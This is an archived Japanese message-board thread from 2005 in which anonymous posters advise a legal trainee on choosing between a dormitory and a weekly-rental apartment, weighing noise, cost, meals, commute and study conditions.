122 :無責任な名無しさん:2005/06/12(日) 10:07:02 ID:Psj0xVPy
>>121
そうか。ごめんね。
難しい問題ではあるわな。
自分で決めるしかないが,よく利益考量すると俺なら寮かな。

ウィークリー
静かな環境が見込まれる・・・その保証はない
毎月赤字・・・赤字と言っても3ヶ月の我慢


談話室の隣がうるさい可能性・・・注意すれば静かになるか
近所との付き合いが面倒・・・知り合いが増えるメリット
情報量がおおい
メシが楽
登庁が楽
図書館近い


要するに騒音など,耳栓してその上からヘッドフォンで音楽流せばいいんじゃないのか?
寝る時間は他の奴も寝てるだろ。




123 :無責任な名無しさん:2005/06/12(日) 10:47:20 ID:rBh1RLWp
確かに寮だと情報量は多いな。
但し,合否にはほとんど関係ないがなw

124 :無責任な名無しさん:2005/06/12(日) 13:01:37 ID:WyxM/4WF
まじめに勉強しないと、留保の運命に・・。今年も30名以上が留保なのかな?

125 :117:2005/06/12(日) 23:56:25 ID:ccEHCCme
お答えいただきまして,ありがとうございました。
検討する時間はもうあまり残っていませんが,
もし談話室の隣室が2回試験に差し障るほど
うるさいのだとしたら,それは
その後の人生にも影響することなので,
よく考えて決めたいと思います。
ありがとうございました。

36 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)